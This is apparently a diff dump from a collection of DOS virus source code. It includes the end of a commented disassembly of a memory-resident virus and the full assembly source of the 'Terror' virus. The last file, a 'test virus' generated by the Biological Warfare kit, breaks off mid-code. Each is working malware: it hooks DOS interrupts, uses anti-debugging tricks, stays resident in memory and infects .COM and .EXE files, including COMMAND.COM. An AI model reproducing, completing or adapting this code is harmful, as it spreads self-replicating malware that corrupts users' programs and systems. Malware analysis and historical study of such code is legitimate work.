;<- four bytes from int 21h service
|
||||
d_0428: cmp ah,51h ;17A8 80 FC 51
|
||||
d_042B: je l_17B2 ;17AB 74 05
|
||||
jmp dword ptr cs:[547h] ;17AD 2E: FF 2E 0547
|
||||
l_17B2: jmp dword ptr cs:[49Dh] ;17B2 2E: FF 2E 049D
|
||||
|
||||
d_0437 dw 0000h,02A0h ;dword = code length ;17B7 00 00 A0 02
|
||||
|
||||
;================================================================
|
||||
; Make virus resident
|
||||
;----------------------------------------------------------------
|
||||
s_17BB proc near
|
||||
cli ;disable interrupts ;17BB FA
|
||||
push es ;17BC 06
|
||||
lea si,cs:[413h] ;l_1793 ;17BD 8D 36 0413
|
||||
mov di,si ;17C1 8B FE
|
||||
mov cx,9800h ;resident virus segment ;17C3 B9 9800
|
||||
mov es,cx ;17C6 8E C1
|
||||
mov cx,0Ah ;17C8 B9 000A
|
||||
repe cmpsb ;17CB F3/ A6
|
||||
cmp cx,0 ;17CD 83 F9 00
|
||||
pop es ;17D0 07
|
||||
jz l_181A ;-> allready resident ;17D1 74 47
|
||||
mov bx,es:[84h] ;int 21h - offset ;17D3 26: 8B 1E 0084
|
||||
mov ax,es:[86h] ;int 21h - segment ;17D8 26: A1 0086
|
||||
mov word ptr ds:[549h],ax ;l_18C9 ;17DC A3 0549
|
||||
mov word ptr ds:[49Fh],ax ;l_181F ;17DF A3 049F
|
||||
mov di,bx ;17E2 8B FB
|
||||
mov es,ax ;17E4 8E C0
|
||||
mov cx,80h ;17E6 B9 0080
|
||||
mov al,80h ;17E9 B0 80
|
||||
l_17EB: repne scasb ;find byte 80h ;17EB F2/ AE
|
||||
cmp cx,0 ;17ED 83 F9 00
|
||||
je l_1870 ;-> not found, EXIT ;17F0 74 7E
|
||||
cmp byte ptr es:[di],0FCh ;17F2 26: 80 3D FC
|
||||
jne l_17EB ;-> find another place ;17F6 75 F3
|
||||
|
||||
;<- get four bytes from int 21h service
|
||||
mov al,es:[di+2] ;17F8 26: 8A 45 02
|
||||
mov byte ptr cs:[42Bh],al ;l_17AB ;17FC 2E: A2 042B
|
||||
mov al,es:[di-1] ;1800 26: 8A 45 FF
|
||||
mov byte ptr cs:[428h],al ;l_17A8 ;1804 2E: A2 0428
|
||||
mov al,es:[di] ;1808 26: 8A 05
|
||||
mov byte ptr cs:[429h],al ;l_17A8+1 ;180B 2E: A2 0429
|
||||
mov al,es:[di+1] ;180F 26: 8A 45 01
|
||||
mov byte ptr cs:[42Ah],al ;l_17A8+2 ;1813 2E: A2 042A
|
||||
jmp short l_1821 ;1817 EB 08
|
||||
nop ;1819 90
|
||||
|
||||
;<- allready resident
|
||||
l_181A: jmp short l_1870 ;-> EXIT ;181A EB 54
|
||||
nop ;181C 90
|
||||
|
||||
d_049D dw 140Dh ;address to jump1 into ;181D 0D 14
|
||||
d_049F dw 0278h ;old int 21h segment ;181F 78 02
|
||||
|
||||
l_1821: mov ax,di ;1821 8B C7
|
||||
add ax,4 ;next to conditional jmp;1823 05 0004
|
||||
xor bx,bx ;1826 33 DB
|
||||
mov bl,es:[di+3] ;jump length ;1828 26: 8A 5D 03
|
||||
add ax,bx ;jump address ;182C 03 C3
|
||||
mov word ptr ds:[49Dh],ax ;l_181D ;182E A3 049D
|
||||
cmp byte ptr es:[di+3],80h ;1831 26: 80 7D 03 80
|
||||
jb l_183E ;-> forward jump ;1836 72 06
|
||||
;<- jump backwards
|
||||
sub ax,100h ;minus carry ;1838 2D 0100
|
||||
mov word ptr ds:[49Dh],ax ;l_181D ;183B A3 049D
|
||||
l_183E: add di,4 ;second condition addrs ;183E 83 C7 04
|
||||
mov word ptr ds:[547h],di ;1841 89 3E 0547
|
||||
sub di,5 ;<- area to substitute ;1845 83 EF 05
|
||||
push es ;1848 06
|
||||
push di ;1849 57
|
||||
mov dx,9800h ;resident virus segment ;184A BA 9800
|
||||
mov word ptr cs:[4F5h],dx ;184D 2E: 89 16 04F5
|
||||
mov es,dx ;1852 8E C2
|
||||
xor si,si ;1854 33 F6
|
||||
xor di,di ;1856 33 FF
|
||||
mov cx,612h ;l_1380 -> l_1992 ;1858 B9 0612
|
||||
rep movsb ;copy virus code ;185B F3/ A4
|
||||
|
||||
;<----- take control over int 21h
|
||||
lea cx,cs:[413h] ;offset l_1793 ;185D 8D 0E 0413
|
||||
mov word ptr ds:[4F3h],cx ;1861 89 0E 04F3
|
||||
pop di ;1865 5F
|
||||
pop es ;1866 07
|
||||
mov cx,5 ;1867 B9 0005
|
||||
lea si,cs:[4F2h] ;offset l_1792 ;186A 8D 36 04F2
|
||||
rep movsb ;186E F3/ A4
|
||||
l_1870: sti ;1870 FB
|
||||
retn ;1871 C3
|
||||
s_17BB endp
|
||||
|
||||
;<---- instruction pattern to write over int 21h code
|
||||
d_04F2 db 0EAh ;JMP FAR 9800:l_1793 ;1872 EA
|
||||
d_04F3 dw 0 ;:= offset l_1793 ;1873 00 00
|
||||
d_04F5 dw 9800h ;resident virus segment ;1875 00 98
|
||||
|
||||
;================================================
|
||||
; saved 32 victim bytes
|
||||
;------------------------------------------------
|
||||
d_04F7 db 0E9h,0FFh,11h ;1877 E9 FF 11
|
||||
db 'Converted',0,0,0,0 ;187A 43 6F 6E 76 65 72
|
||||
;1880 74 65 64 00 00 00 00
|
||||
db 'MZ' ;1887 4D 5A
|
||||
db 0EAh,01h,09h,00h,08h,00h ;1889 EA 01 09 00 08 00
|
||||
db 20h,00h,00h,00h,0FFh,0FFh ;188F 20 00 00 00 FF FF
|
||||
db 98h,00h ;1895 98 00 00
|
||||
|
||||
;-----------------------------------
|
||||
db 48 dup (0) ;not used ;1897 0030[00]
|
||||
|
||||
d_0547 dw 146Ch ;address to jump2 into ;18C7 6C 14
|
||||
d_0549 dw 0278h ;old int 21h segment ;18C9 78 02
|
||||
|
||||
;<------ code writed to in case of paragraf alignement
|
||||
db 0E9h ;jmp l_18CF ;18CB E9
|
||||
d_054C dw 052Ch ;distance of jump ;18CC 2C 05
|
||||
db 0 ;18CE 00
|
||||
|
||||
;================================================================
|
||||
; EXE virus entry
|
||||
;----------------------------------------------------------------
|
||||
l_18CF: push bx ;18CF 53
|
||||
push cx ;18D0 51
|
||||
push es ;18D1 06
|
||||
push ds ;18D2 1E
|
||||
pushf ;18D3 9C
|
||||
mov ax,cs ;18D4 8C C8
|
||||
mov ds,ax ;18D6 8E D8
|
||||
call s_1938 ;make virus resident ;18D8 E8 005D
|
||||
cmp byte ptr ds:[349h],0FFh ;l_16C9 (0FFh=COM) ;18DB 80 3E 0349 FF
|
||||
je l_18E5 ;18E0 74 03
|
||||
jmp short l_1953 ;-> ? ;18E2 EB 6F
|
||||
nop ;18E4 90
|
||||
|
||||
;================================================================
|
||||
; End of virus code - file *.COM
|
||||
;----------------------------------------------------------------
|
||||
l_18E5: popf ;18E5 9D
|
||||
pop ds ;18E6 1F
|
||||
pop es ;18E7 07
|
||||
pop cx ;18E8 59
|
||||
pop bx ;18E9 5B
|
||||
mov word ptr cs:[5B4h],100h ;l_1934 = victim IP ;18EA 2E: C7 06 05B4 0100
|
||||
mov ax,es ;18F1 8C C0
|
||||
mov word ptr cs:[5B6h],ax ;l_1936 = victim CS ;18F3 2E: A3 05B6
|
||||
call s_16CA ;init registers ;18F7 E8 FDD0
|
||||
jmp dword ptr cs:[5B4h] ;l_1934 -> run victim ;18FA 2E: FF 2E 05B4
|
||||
|
||||
;<--- victim name
|
||||
d_057F db 'A:\SYS.COM' ;18FF 41 3A 5C 53 59 53
|
||||
;1905 2E 43 4F 4D
|
||||
db 0,'XE',0,'E',0 ;1909 00 58 45 00 45 00
|
||||
db 9 dup (0) ;190F 0009[00]
|
||||
|
||||
;================================================================
|
||||
; ANTYDEBUG - make virus resident
|
||||
;----------------------------------------------------------------
|
||||
s_1918 proc near
|
||||
cmp ax,3000h ;1918 3D 3000
|
||||
jne l_1925 ;-> int 3 ;191B 75 08
|
||||
call s_17BB ;-> make virus resident ;191D E8 FE9B
|
||||
retn ;1920 C3
|
||||
s_1918 endp
|
||||
|
||||
d_05A1 dw 002Ah ;victim SS (rel) ;1921 2A 00
|
||||
d_05A3 dw 1388h ;victim SP ;1923 88 13
|
||||
|
||||
;================================================================
|
||||
; ANTYDEBUG - call int 3 (Breakpoint)
|
||||
;----------------------------------------------------------------
|
||||
s_1925 proc near
|
||||
l_1925: mov ax,3000h ;Flag register ;1925 B8 3000
|
||||
push ax ;1928 50
|
||||
l_1929: call dword ptr es:[0Ch] ;int 3 (Breakpoint) ;1929 26: FF 1E 000C
|
||||
cmp ax,3000h ;192E 3D 3000
|
||||
jne l_1929 ;1931 75 F6
|
||||
retn ;1933 C3
|
||||
s_1925 endp
|
||||
|
||||
d_05B4 dw 0000h ;victim IP ;1934 00 00
|
||||
d_05B6 dw 000Bh ;victim CS (rel) ;1936 0B 00
|
||||
|
||||
;================================================================
|
||||
; Make virus resident
|
||||
;----------------------------------------------------------------
|
||||
s_1938 proc near
|
||||
push es ;1938 06
|
||||
call s_1948 ;-> INT 1 (single step) ;1939 E8 000C
|
||||
cmp ax,0 ;193C 3D 0000
|
||||
jne l_1947 ;193F 75 06
|
||||
call s_1925 ;-> INT 3 (Breakpoint) ;1941 E8 FFE1
|
||||
call s_1918 ;-> reside virus ;1944 E8 FFD1
|
||||
l_1947: pop es ;1947 07
|
||||
|
||||
;================================================================
|
||||
; ANTYDEBUG - call int 1 = Single Step
|
||||
;----------------------------------------------------------------
|
||||
s_1948: pushf ;1948 9C
|
||||
xor ax,ax ;1949 33 C0
|
||||
mov es,ax ;194B 8E C0
|
||||
call dword ptr es:[4h] ;int 1 ;194D 26: FF 1E 0004
|
||||
retn ;1952 C3
|
||||
s_1938 endp
|
||||
|
||||
;================================================================
|
||||
; End of virus code - file *.EXE
|
||||
;----------------------------------------------------------------
|
||||
l_1953: popf ;1953 9D
|
||||
pop ds ;1954 1F
|
||||
pop es ;1955 07
|
||||
pop cx ;1956 59
|
||||
pop bx ;1957 5B
|
||||
mov ax,es ;1958 8C C0
|
||||
add ax,10h ;relocating value ;195A 05 0010
|
||||
mov dx,ax ;195D 8B D0
|
||||
mov bp,word ptr cs:[5A1h] ;l_1921 = victim SS ;195F 2E: 8B 2E 05A1
|
||||
add bp,ax ;1964 03 E8
|
||||
mov ss,bp ;1966 8E D5
|
||||
mov bp,word ptr cs:[5A3h] ;l_1923 = victim SP ;1968 2E: 8B 2E 05A3
|
||||
mov sp,bp ;196D 8B E5
|
||||
mov ax,dx ;196F 8B C2
|
||||
add word ptr cs:[5B6h],ax ;l_1936 - CS relocation ;1971 2E: 01 06 05B6
|
||||
call s_16CA ;init registers ;1976 E8 FD51
|
||||
jmp dword ptr cs:[5B4h] ;-> run victim ;1979 2E: FF 2E 05B4
|
||||
|
||||
db 20 dup (0) ;COM file stack ;197E 0014[00]
|
||||
|
||||
d_0612 label byte ;1992h
|
||||
|
||||
seg_a ends
|
||||
|
||||
end start
|
||||
|
File diff suppressed because it is too large
Load Diff
|
@ -0,0 +1,492 @@
|
|||
;**********************************************
|
||||
; Terror Virus
|
||||
;**********************************************
|
||||
|
||||
Code Segment
|
||||
Assume CS:Code
|
||||
Org 100h
|
||||
|
||||
Start: jmp short Begin
|
||||
|
||||
Table310 dw 12E4h,09ABh
|
||||
Table320 dw 138Dh,17D0h
|
||||
Table330 dw 1460h,0F7Ah
|
||||
|
||||
FileBytes dw 12 dup (9090h)
|
||||
|
||||
ComSpec db 'A:\COMMAND.COM',0
|
||||
|
||||
CheckEXE: cmp cs:FileBytes,4D5Ah
|
||||
je IsEXE
|
||||
cmp cs:FileBytes,5A4Dh
|
||||
IsEXE: ret
|
||||
|
||||
Begin: mov word ptr cs:PSPSeg,ds
|
||||
push ax
|
||||
mov ax,0EC59h
|
||||
int 21h
|
||||
cmp bp,ax
|
||||
jnz Install
|
||||
push cs
|
||||
pop ds
|
||||
StartFile: pop ax
|
||||
mov es,word ptr cs:PSPSeg
|
||||
call CheckEXE
|
||||
je ExeFileStart
|
||||
mov cx,13
|
||||
mov si,offset FileBytes
|
||||
push es
|
||||
mov di,100h
|
||||
push di
|
||||
rep movsb
|
||||
push es
|
||||
pop ds
|
||||
retf
|
||||
ExeFileStart: mov si,es
|
||||
add si,10h
|
||||
add cs:FileBytes [16h],si
|
||||
add si,cs:FileBytes [0Eh]
|
||||
mov di,cs:FileBytes [10h]
|
||||
push es
|
||||
pop ds
|
||||
cli
|
||||
mov ss,si
|
||||
mov sp,di
|
||||
sti
|
||||
jmp dword ptr cs:FileBytes [14h]
|
||||
|
||||
Install: mov ah,30h
|
||||
int 21h
|
||||
mov bx,offset Table310
|
||||
cmp ax,0A03h
|
||||
jne Not310
|
||||
mov ax,0070h
|
||||
mov bx,0D43h
|
||||
mov es,ax
|
||||
cmp byte ptr es:[bx],2Eh ; CS prefix
|
||||
jne SetVectors
|
||||
mov ax,bx
|
||||
jmp short SetV1
|
||||
Not310: add bx,4
|
||||
cmp ax,1403h
|
||||
je SetVectors
|
||||
add bx,4
|
||||
cmp ax,1E03h
|
||||
je SetVectors
|
||||
mov ax,3513h
|
||||
int 21h
|
||||
mov word ptr cs:True13, bx
|
||||
mov word ptr cs:True13 + 2,es
|
||||
mov ax,3521h
|
||||
mov dx,bx
|
||||
jmp short Set21
|
||||
SetVectors: mov ax,word ptr cs:[bx+2]
|
||||
SetV1: mov dx,word ptr cs:[bx]
|
||||
mov word ptr cs:True13,ax
|
||||
mov word ptr cs:True13 + 2,0070h
|
||||
mov ah,34h
|
||||
int 21h
|
||||
Set21: push es
|
||||
pop ds
|
||||
mov ax,25ECh
|
||||
int 21h
|
||||
mov ax,word ptr cs:PSPSeg
|
||||
mov es,ax
|
||||
dec ax
|
||||
mov ds,ax
|
||||
mov bx,word ptr ds:[3]
|
||||
sub bx,101
|
||||
add ax,bx
|
||||
mov word ptr es:[0002h],ax ; Setup PSP memory size.
|
||||
; Command.COM needs that
|
||||
; action; else the system
|
||||
; hangs.
|
||||
mov ah,4Ah
|
||||
int 0ECh
|
||||
mov bx,100
|
||||
mov ah,48h
|
||||
int 0ECh
|
||||
sub ax,10h
|
||||
mov es,ax
|
||||
mov byte ptr ds:[0000h],5Ah ; This is the last block,
|
||||
; don't you think so?
|
||||
push cs
|
||||
pop ds
|
||||
mov si,100h
|
||||
mov di,si
|
||||
mov cx,MovedSize
|
||||
rep movsb
|
||||
mov di,offset Continue
|
||||
push es
|
||||
push di
|
||||
retf
|
||||
|
||||
Continue: mov word ptr es:[0F1h],0070h
|
||||
mov ax,3521h
|
||||
int 0ECh
|
||||
mov word ptr cs:Saved21, bx
|
||||
mov word ptr cs:Saved21 + 2,es
|
||||
mov ah,25h
|
||||
mov dx,offset Int21
|
||||
push cs
|
||||
pop ds
|
||||
int 0ECh
|
||||
push cs
|
||||
pop es
|
||||
mov di,offset Handles
|
||||
mov cx,25
|
||||
mov al,0
|
||||
rep stosb
|
||||
jmp StartFile
|
||||
|
||||
Respond: mov bp,ax
|
||||
iret
|
||||
|
||||
Int21: cmp ax,0EC59h
|
||||
je Respond
|
||||
cmp ax,4B00h
|
||||
je Exec
|
||||
cmp ah,3Dh
|
||||
je Open
|
||||
cmp ah,3Eh
|
||||
je Close
|
||||
cmp ah,11h
|
||||
jne End21
|
||||
push di
|
||||
mov di,dx
|
||||
cmp byte ptr ds:[di+6],08 ; Volume ID attributes
|
||||
je Find1st
|
||||
EndF1st: pop di
|
||||
End21: db 0EAh
|
||||
Saved21 dd ?
|
||||
Exec: call InfectName
|
||||
jmp End21
|
||||
OpenEnd: pop cx
|
||||
jmp End21
|
||||
Open: push cx
|
||||
call GetAttr
|
||||
jc OpenEnd
|
||||
cmp cx,20h
|
||||
pop cx
|
||||
jne End21
|
||||
mov al,2
|
||||
pushf
|
||||
call dword ptr cs:Saved21
|
||||
jc Err21
|
||||
push ax
|
||||
push bx
|
||||
mov bx,ax
|
||||
mov al,byte ptr cs:Command?
|
||||
mov byte ptr cs:Handles [bx],al
|
||||
pop bx
|
||||
pop ax
|
||||
Err21: retf 2
|
||||
Close: cmp byte ptr cs:Handles [bx],0
|
||||
jz End21
|
||||
push ax
|
||||
mov al,byte ptr cs:Handles [bx]
|
||||
mov byte ptr cs:Command?,al
|
||||
mov byte ptr cs:Handles [bx],0
|
||||
mov ah,45h
|
||||
int 0ECh
|
||||
mov word ptr cs:TempHandle,ax
|
||||
pop ax
|
||||
jc End21
|
||||
pushf
|
||||
call dword ptr cs:Saved21
|
||||
jc Err21
|
||||
push bx
|
||||
mov bx,word ptr cs:TempHandle
|
||||
push ds
|
||||
call SetV
|
||||
call InfectHandle
|
||||
call Restore
|
||||
pop ds
|
||||
pop bx
|
||||
clc
|
||||
retf 2
|
||||
Find1st: push ax
|
||||
push dx
|
||||
push ds
|
||||
mov al,byte ptr ds:[di+7]
|
||||
mov dx,offset Comspec
|
||||
or al,al
|
||||
jz CurrentDrive
|
||||
add al,'A'-1
|
||||
mov byte ptr cs:Comspec,al
|
||||
jmp short Infect1st
|
||||
CurrentDrive: add dx,2
|
||||
Infect1st: push cs
|
||||
pop ds
|
||||
call InfectName
|
||||
pop ds
|
||||
pop dx
|
||||
pop ax
|
||||
jmp EndF1st
|
||||
|
||||
InfectName: push ax
|
||||
push bx
|
||||
push cx
|
||||
call GetAttr
|
||||
jc EndIN0
|
||||
push cx
|
||||
push ds
|
||||
call SetV
|
||||
pop ds
|
||||
mov ax,4301h
|
||||
xor cx,cx
|
||||
int 0ECh
|
||||
jc EndIN1
|
||||
mov ax,3D02h
|
||||
int 0ECh
|
||||
mov bx,ax
|
||||
EndIN1: pop cx
|
||||
jc EndInfName
|
||||
call InfectHandle
|
||||
mov ax,4301h
|
||||
int 0ECh
|
||||
EndInfName: call Restore
|
||||
EndIN0: pop cx
|
||||
pop bx
|
||||
pop ax
|
||||
ret
|
||||
|
||||
SetV: push ax
|
||||
push dx
|
||||
push bx
|
||||
push es
|
||||
mov ax,3513h
|
||||
int 0ECh
|
||||
mov word ptr cs:Old13,bx
|
||||
mov word ptr cs:Old13+2,es
|
||||
mov al,24h
|
||||
int 0ECh
|
||||
mov word ptr cs:Old24,bx
|
||||
mov word ptr cs:Old24+2,es
|
||||
pop es
|
||||
pop bx
|
||||
push cs
|
||||
pop ds
|
||||
mov dx,offset Critical
|
||||
mov ah,25h
|
||||
int 0ECh
|
||||
mov dx,offset Int13
|
||||
mov al,13h
|
||||
int 0ECh
|
||||
pop dx
|
||||
pop ax
|
||||
ret
|
||||
|
||||
InfectHandle: push ax
|
||||
push cx
|
||||
push dx
|
||||
push si
|
||||
push di
|
||||
push ds
|
||||
mov di,offset FileBytes
|
||||
mov cx,0FFFFh
|
||||
mov dx,-6
|
||||
mov ax,4202h
|
||||
int 0ECh
|
||||
mov ah,3Fh
|
||||
mov cx,6
|
||||
push cs
|
||||
pop ds
|
||||
mov dx,di
|
||||
int 0ECh
|
||||
jc EndH1
|
||||
cmp word ptr cs:[di],'eT'
|
||||
je EndH1
|
||||
xor cx,cx
|
||||
xor dx,dx
|
||||
mov ax,4200h
|
||||
int 0ECh
|
||||
mov ah,3Fh
|
||||
mov cx,24
|
||||
mov dx,di
|
||||
int 0ECh
|
||||
jnc ReadOk
|
||||
EndH1: jmp EndInfHandle
|
||||
ReadOk: xor cx,cx
|
||||
xor dx,dx
|
||||
cmp byte ptr cs:Command?,2
|
||||
jne Seek
|
||||
cmp word ptr ds:[di+1],4000h ; Is there some
|
||||
; another virus
|
||||
; in the stack?
|
||||
ja EndH1
|
||||
dec cx
|
||||
mov dx,-(VirusSize+64)
|
||||
Seek: mov ax,4202h
|
||||
Seek1: int 0ECh
|
||||
test ax,000Fh
|
||||
jz SeekOk
|
||||
mov cx,dx
|
||||
mov dx,ax
|
||||
add dx,10h
|
||||
and dl,0F0h
|
||||
mov ax,4200h
|
||||
jmp Seek1
|
||||
SeekOk: call CheckEXE
|
||||
je SkipEXE
|
||||
or dx,dx
|
||||
jnz EndH1
|
||||
cmp ax,1024
|
||||
jnb MayBeGood?
|
||||
jmp EndInfHandle
|
||||
MayBeGood?: cmp ax,64000
|
||||
ja EndInfHandle
|
||||
SkipEXE: mov cl,4
|
||||
shr ax,cl
|
||||
mov si,ax
|
||||
mov cl,12
|
||||
shl dx,cl
|
||||
add si,dx
|
||||
mov ah,40h
|
||||
mov dx,100h
|
||||
mov cx,VirusSize
|
||||
int 0ECh
|
||||
jc EndInfHandle
|
||||
call CheckEXE
|
||||
jne ComFile
|
||||
sub si,10h
|
||||
sub si,word ptr cs:[di+08h]
|
||||
mov word ptr cs:[di+14h],100h
|
||||
mov word ptr cs:[di+16h],si
|
||||
mov word ptr cs:[di+10h],400h
|
||||
add si,VirusSize / 16 + 1
|
||||
mov word ptr cs:[di+0Eh],si
|
||||
mov ax,4202h
|
||||
xor cx,cx
|
||||
xor dx,dx
|
||||
int 0ECh
|
||||
mov cx,200h
|
||||
div cx
|
||||
or dx,dx
|
||||
jz DontAdjust
|
||||
inc ax
|
||||
DontAdjust: mov word ptr cs:[di+02h],dx
|
||||
mov word ptr cs:[di+04h],ax
|
||||
jmp short Common
|
||||
ComFile: push si
|
||||
push di
|
||||
push es
|
||||
push cs
|
||||
pop es
|
||||
mov si,offset ComHeader
|
||||
mov cx,11
|
||||
rep movsb
|
||||
pop es
|
||||
pop di
|
||||
pop ds:[di+11]
|
||||
Common: mov ax,4200h
|
||||
xor cx,cx
|
||||
xor dx,dx
|
||||
int 0ECh
|
||||
mov ah,40h
|
||||
mov cx,24
|
||||
mov dx,di
|
||||
int 0ECh
|
||||
EndInfHandle: mov ax,5700h
|
||||
int 0ECh
|
||||
mov al,1
|
||||
int 0ECh
|
||||
mov ah,3Eh
|
||||
int 0ECh
|
||||
pop ds
|
||||
pop di
|
||||
pop si
|
||||
pop dx
|
||||
pop cx
|
||||
pop ax
|
||||
ret
|
||||
|
||||
Restore: push ax
|
||||
push dx
|
||||
push ds
|
||||
mov ax,2513h
|
||||
mov dx,word ptr cs:Old13
|
||||
mov ds,word ptr cs:Old13+2
|
||||
int 0ECh
|
||||
mov al,24h
|
||||
mov dx,word ptr cs:Old24
|
||||
mov ds,word ptr cs:Old24+2
|
||||
pop ds
|
||||
pop dx
|
||||
pop ax
|
||||
ret
|
||||
|
||||
GetAttr: push ax
|
||||
push es
|
||||
push di
|
||||
push bx
|
||||
mov di,dx
|
||||
push ds
|
||||
pop es
|
||||
mov al,0
|
||||
mov cx,64
|
||||
repne scasb
|
||||
mov ax,word ptr ds:[di-3]
|
||||
mov cx,word ptr ds:[di-5]
|
||||
and ax,5F5Fh ; Upcase extension
|
||||
and ch,5Fh
|
||||
cmp ax,'MO'
|
||||
jne Exe?
|
||||
cmp cx,'C.'
|
||||
je CommandChk
|
||||
ErrAttr: stc
|
||||
jmp short EndAttr
|
||||
Exe?: cmp ax,'EX'
|
||||
jne ErrAttr
|
||||
cmp cx,'E.'
|
||||
jne ErrAttr
|
||||
CommandChk: mov cx,7
|
||||
mov bx,-1
|
||||
Loop0: inc bx
|
||||
mov al,byte ptr ds:[bx+di-12]
|
||||
and al,5Fh
|
||||
cmp al,byte ptr cs:Comspec [bx+3]
|
||||
loope Loop0
|
||||
mov al,1
|
||||
jne NoCommand
|
||||
mov al,2
|
||||
NoCommand: mov byte ptr cs:Command?,al
|
||||
mov ax,4300h
|
||||
int 0ECh
|
||||
EndAttr: pop bx
|
||||
pop di
|
||||
pop es
|
||||
pop ax
|
||||
ret
|
||||
|
||||
Critical: mov al,3
|
||||
iret
|
||||
|
||||
Int13: cmp ah,3
|
||||
jz Skip13
|
||||
db 0EAh ; JMP Far
|
||||
Old13 dd ?
|
||||
Skip13: db 0EAh
|
||||
True13 dd ?
|
||||
|
||||
ComHeader db 50h,8Ch,0C8h,01h,06h,0Bh,01h,58h,0EAh,00h,01h
|
||||
|
||||
Terror db ' Terror'
|
||||
|
||||
VirusEnd label byte
|
||||
|
||||
VirusSize = offset VirusEnd - offset Start
|
||||
|
||||
Old24 dd ?
|
||||
|
||||
TempHandle label word
|
||||
PSPSeg dw ?
|
||||
|
||||
MovedSize = $ - offset Start
|
||||
|
||||
Handles db 25 dup (?)
|
||||
|
||||
Command? db ?
|
||||
|
||||
Code EndS
|
||||
End Start
|
|
@ -0,0 +1,379 @@
|
|||
; test1.asm : Test virus #1
|
||||
; Created with Biological Warfare - Version 0.90á by MnemoniX
|
||||
|
||||
PING equ 0F43Fh
|
||||
PONG equ 0B1DEh
|
||||
STAMP equ 26
|
||||
MARKER equ 07070h
|
||||
|
||||
code segment
|
||||
org 0
|
||||
assume cs:code,ds:code
|
||||
|
||||
start:
|
||||
db 0E9h,3,0 ; to virus
|
||||
host:
|
||||
db 0CDh,20h,0 ; host program
|
||||
virus_begin:
|
||||
push ds es
|
||||
|
||||
call $ + 3 ; BP is instruction ptr.
|
||||
pop bp
|
||||
sub bp,offset $ - 1
|
||||
|
||||
xor ax,ax ; mild anti-trace code
|
||||
mov es,ax ; kill interrupts 1 & 3
|
||||
mov di,6
|
||||
stosw
|
||||
mov di,14
|
||||
stosw
|
||||
|
||||
in al,21h ; lock out & reopen keyboard
|
||||
xor al,2
|
||||
out 21h,al
|
||||
xor al,2
|
||||
out 21h,al
|
||||
|
||||
mov ax,PING ; test for residency
|
||||
int 21h
|
||||
cmp bx,PONG
|
||||
je installed
|
||||
|
||||
mov ax,es ; Get PSP
|
||||
dec ax
|
||||
mov ds,ax ; Get MCB
|
||||
|
||||
sub word ptr ds:[3],((MEM_SIZE+1023) / 1024) * 64
|
||||
sub word ptr ds:[12h],((MEM_SIZE+1023) / 1024) * 64
|
||||
mov es,word ptr ds:[12h]
|
||||
|
||||
push cs ; copy virus into memory
|
||||
pop ds
|
||||
xor di,di
|
||||
mov si,bp
|
||||
mov cx,(virus_end - start) / 2 + 1
|
||||
rep movsw
|
||||
|
||||
xor ax,ax ; capture interrupts
|
||||
mov ds,ax
|
||||
|
||||
mov si,21h * 4 ; get original int 21
|
||||
mov di,offset old_int_21
|
||||
movsw
|
||||
movsw
|
||||
|
||||
mov word ptr ds:[si - 4],offset new_int_21
|
||||
mov ds:[si - 2],es ; and set new int 21
|
||||
|
||||
installed:
|
||||
pop es ds ; restore segregs
|
||||
cmp sp,MARKER ; check for .EXE
|
||||
je exe_exit
|
||||
|
||||
com_exit:
|
||||
mov si,[bp + mutator] ; restore host program
|
||||
sub si,3
|
||||
mov di,100h
|
||||
push di
|
||||
movsw
|
||||
movsb
|
||||
|
||||
call fix_regs ; fix up registers
|
||||
ret ; and leave
|
||||
exe_exit:
|
||||
mov ax,ds ; fix up return address
|
||||
add ax,10h
|
||||
push ax
|
||||
add ax,cs:[bp + exe_cs]
|
||||
mov cs:[bp + return_cs],ax
|
||||
|
||||
mov ax,cs:[bp + exe_ip]
|
||||
mov cs:[bp + return_ip],ax
|
||||
|
||||
pop ax
|
||||
add ax,cs:[bp + exe_ss] ; restore stack
|
||||
cli
|
||||
mov ss,ax
|
||||
mov sp,cs:[bp + exe_sp]
|
||||
|
||||
call fix_regs ; fix up registers
|
||||
sti
|
||||
|
||||
db 0EAh ; back to host program
|
||||
return_ip dw 0
|
||||
return_cs dw 0
|
||||
|
||||
exe_cs dw -16 ; orig CS:IP
|
||||
exe_ip dw 103h
|
||||
exe_sp dw -2 ; orig SS:SP
|
||||
exe_ss dw -16
|
||||
|
||||
fix_regs:
|
||||
xor ax,ax
|
||||
cwd
|
||||
xor bx,bx
|
||||
mov si,100h
|
||||
xor di,di
|
||||
xor bp,bp
|
||||
ret
|
||||
|
||||
; interrupt 21 handler
|
||||
int_21:
|
||||
pushf
|
||||
call dword ptr cs:[old_int_21]
|
||||
ret
|
||||
|
||||
new_int_21:
|
||||
cmp ax,PING ; residency test
|
||||
je ping_pong
|
||||
cmp ah,3Dh ; file open
|
||||
je file_open
|
||||
cmp ax,4B00h ; execute program
|
||||
je execute
|
||||
int_21_exit:
|
||||
db 0EAh ; never mind ...
|
||||
old_int_21 dd 0
|
||||
|
||||
ping_pong:
|
||||
mov bx,PONG
|
||||
iret
|
||||
|
||||
file_open:
|
||||
push ax cx di es
|
||||
call get_extension
|
||||
cmp [di],'OC' ; .COM file?
|
||||
jne perhaps_exe ; perhaps .EXE then
|
||||
cmp byte ptr [di + 2],'M'
|
||||
jne not_prog
|
||||
jmp a_program
|
||||
perhaps_exe:
|
||||
cmp [di],'XE' ; .EXE file?
|
||||
jne not_prog
|
||||
cmp byte ptr [di + 2],'E'
|
||||
jne not_prog
|
||||
a_program:
|
||||
pop es di cx ax
|
||||
jmp execute ; infect file
|
||||
not_prog:
|
||||
pop es di cx ax
|
||||
jmp int_21_exit
|
||||
|
||||
execute:
|
||||
push ax bx cx dx si di ds es
|
||||
|
||||
xor ax,ax ; critical error handler
|
||||
mov es,ax ; routine - catch int 24
|
||||
mov es:[24h * 4],offset int_24
|
||||
mov es:[24h * 4 + 2],cs
|
||||
|
||||
mov ax,4300h ; change attributes
|
||||
int 21h
|
||||
|
||||
push cx dx ds
|
||||
xor cx,cx
|
||||
call set_attributes
|
||||
|
||||
mov ax,3D02h ; open file
|
||||
call int_21
|
||||
jnc open_it
|
||||
jmp cant_open
|
||||
open_it:
|
||||
xchg bx,ax
|
||||
|
||||
push cs ; CS = DS
|
||||
pop ds
|
||||
|
||||
mov ax,5700h ; save file date/time
|
||||
int 21h
|
||||
push cx dx
|
||||
and cl,31 ; check time stamp
|
||||
cmp cl,STAMP
|
||||
jnz its_ok
|
||||
jmp dont_infect
|
||||
its_ok:
|
||||
mov ah,3Fh
|
||||
mov cx,28
|
||||
mov dx,offset read_buffer
|
||||
int 21h
|
||||
|
||||
cmp word ptr read_buffer,'ZM' ; .EXE?
|
||||
